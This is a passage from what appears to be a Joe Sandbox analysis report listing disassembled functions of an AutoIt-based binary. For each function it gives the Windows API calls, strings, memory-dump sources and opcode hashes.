                                                                                                                                Function 00F4C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F4C5E5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                                • Opcode ID: f82ab6fe3a6099a6163c3f41669674f48cb138917ff73b1a2d3ceaeee8d10275
                                                                                                                                • Instruction ID: bd19914375736e6e1255dd5e2f8b11355c3517fc48e5e0262db6ae54262ede5d
                                                                                                                                • Opcode Fuzzy Hash: f82ab6fe3a6099a6163c3f41669674f48cb138917ff73b1a2d3ceaeee8d10275
                                                                                                                                • Instruction Fuzzy Hash: 2701B571641118AFCB45FF64CC52DFE7B69AF423107180619F862E72D1DE38A948F790
                                                                                                                                Function 00F5C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __fread_nolock_memmove
                                                                                                                                • String ID: EA06
                                                                                                                                • API String ID: 1988441806-3962188686
                                                                                                                                • Opcode ID: a69fe66543aad616331f24f7317545a6ba0ce50ded808d8772f8318f017c3f4e
                                                                                                                                • Instruction ID: 2150bc69e72cd0765ac17763d1f0484bd8bcad43e4af52799cc625347eea9444
                                                                                                                                • Opcode Fuzzy Hash: a69fe66543aad616331f24f7317545a6ba0ce50ded808d8772f8318f017c3f4e
                                                                                                                                • Instruction Fuzzy Hash: B301F572D002186EDB28C7A8CC16FFE7BF89B05711F00416AE593D6181E5B8F7089BA0
                                                                                                                                Function 00F4C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F4C4E1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                                • Opcode ID: 9ffbd1fe41476bc3d792ca7eb198f60e0b39c42ff1eb2635fb7d54bbb35817e2
                                                                                                                                • Instruction ID: f393dff09350ea96a06f900dccc6b41868ab74f9ee48404d73a1fdaed8c34444
                                                                                                                                • Opcode Fuzzy Hash: 9ffbd1fe41476bc3d792ca7eb198f60e0b39c42ff1eb2635fb7d54bbb35817e2
                                                                                                                                • Instruction Fuzzy Hash: A401A771A41108ABC745FBA4CE63EFF77A89F45700F140019B943E31D1DA589E08F6E1
                                                                                                                                Function 00F4C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F4C562
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                                • Opcode ID: 6ae20899c5ad8d3030bf0b725d0a8ecf47303468c40ac13f230abeb92e4bc6bc
                                                                                                                                • Instruction ID: 9e280b5cdf4e52c5f65396c466f15a2afe95276ae938286ac1145a7d0de80004
                                                                                                                                • Opcode Fuzzy Hash: 6ae20899c5ad8d3030bf0b725d0a8ecf47303468c40ac13f230abeb92e4bc6bc
                                                                                                                                • Instruction Fuzzy Hash: 1201A271A42108ABCB45FBA4CD52FFF77A89F01701F180015B943E3182DA589E49B6E1
                                                                                                                                Function 00F5804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassName_wcscmp
                                                                                                                                • String ID: #32770
                                                                                                                                • API String ID: 2292705959-463685578
                                                                                                                                • Opcode ID: 96bf5f36b35893f74e1048f308031fc916a4a19bef15282741ee687de4a61f8f
                                                                                                                                • Instruction ID: 2dd223d90f3d8e2708fe34cf4f56c2489696a288bbfb601871e8817ea85b7a3a
                                                                                                                                • Opcode Fuzzy Hash: 96bf5f36b35893f74e1048f308031fc916a4a19bef15282741ee687de4a61f8f
                                                                                                                                • Instruction Fuzzy Hash: 75E09233A0022926D720EBA59C0AF97FBACEB517A4F000026AA14E3081D664D6459BD4
                                                                                                                                Function 00F4B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F4B36B
                                                                                                                                  • Part of subcall function 00F32011: _doexit.LIBCMT ref: 00F3201B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message_doexit
                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                                • Opcode ID: 01a19455e0822e516bc757fd07ad688186d2444c38cab544d58545779ea2f9cd
                                                                                                                                • Instruction ID: 31f1c61e811cd15b278cd4e0fa69db0c6cb84709c93175cc6166759fe093f9b0
                                                                                                                                • Opcode Fuzzy Hash: 01a19455e0822e516bc757fd07ad688186d2444c38cab544d58545779ea2f9cd
                                                                                                                                • Instruction Fuzzy Hash: D0D0123128431C32D25536957C07FD976888F05B61F100016BF08555C28ED5E4D071A9
                                                                                                                                Function 00F8BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 00F8BAB8
                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F8BCAB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DirectoryFreeLibrarySystem
                                                                                                                                • String ID: WIN_XPe
                                                                                                                                • API String ID: 510247158-3257408948
                                                                                                                                • Opcode ID: 4ea1a4d22fab69f31f4833e785089452c50b5c06bfc5e60679761ee8d8760451
                                                                                                                                • Instruction ID: cb8481c4a5ac06a1edbfe517fda21179c22f5825b8701811fa39a2dd700e929a
                                                                                                                                • Opcode Fuzzy Hash: 4ea1a4d22fab69f31f4833e785089452c50b5c06bfc5e60679761ee8d8760451
                                                                                                                                • Instruction Fuzzy Hash: BEE0ED71C0410DEFDB19EBA8DC45AECB7B8BF08300F248496E422B2050C7795A45FF21
                                                                                                                                Function 00F784C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F784DF
                                                                                                                                • PostMessageW.USER32(00000000), ref: 00F784E6
                                                                                                                                  • Part of subcall function 00F58355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F583CD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                • Opcode ID: 123ca08eaa307d750601828317a701243617548b36cd1cdb6343140d44c1ba86
                                                                                                                                • Instruction ID: 39f6b966aa852e2959ef14824b17927c19387adb2fe4e3db685b2f0f2740ebe0
                                                                                                                                • Opcode Fuzzy Hash: 123ca08eaa307d750601828317a701243617548b36cd1cdb6343140d44c1ba86
                                                                                                                                • Instruction Fuzzy Hash: BED022323803087BE720A370DD0FFC77604AB18B41F10082A7309AA1C0C8E0B800E221
                                                                                                                                Function 00F78495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F7849F
                                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F784B2
                                                                                                                                  • Part of subcall function 00F58355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F583CD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                • Opcode ID: 52437e9a7611744f567b5dcf4150f65fec18c77fad44efdf4f128ce818dc886b
                                                                                                                                • Instruction ID: 40c5e426713dec63f72132695d73444fbf8ca3f5e4754d4b0d517b4306662742
                                                                                                                                • Opcode Fuzzy Hash: 52437e9a7611744f567b5dcf4150f65fec18c77fad44efdf4f128ce818dc886b
                                                                                                                                • Instruction Fuzzy Hash: 1BD02232384308B7E720A370DD0FFC77A04AB14B41F10082A7309AA1C0C8E0B800E220
                                                                                                                                Function 00F5D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00F5D01E
                                                                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00F5D035
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                                • String ID: aut
                                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                                • Opcode ID: 9e50937b4975b2a7423f1e14fcb66ad037814e5979e96237c3c0eaec46378454
                                                                                                                                • Instruction ID: 6129bf7cde7856324b6ebb9ab5736b7bd8e85b7ddf3f8fac1d69468f12f5d6cd
                                                                                                                                • Opcode Fuzzy Hash: 9e50937b4975b2a7423f1e14fcb66ad037814e5979e96237c3c0eaec46378454
                                                                                                                                • Instruction Fuzzy Hash: 2DD05EB154030EBBDB10ABA0EE0EF99B76CA700B44F2041917614D10D1D2B0E6459BA1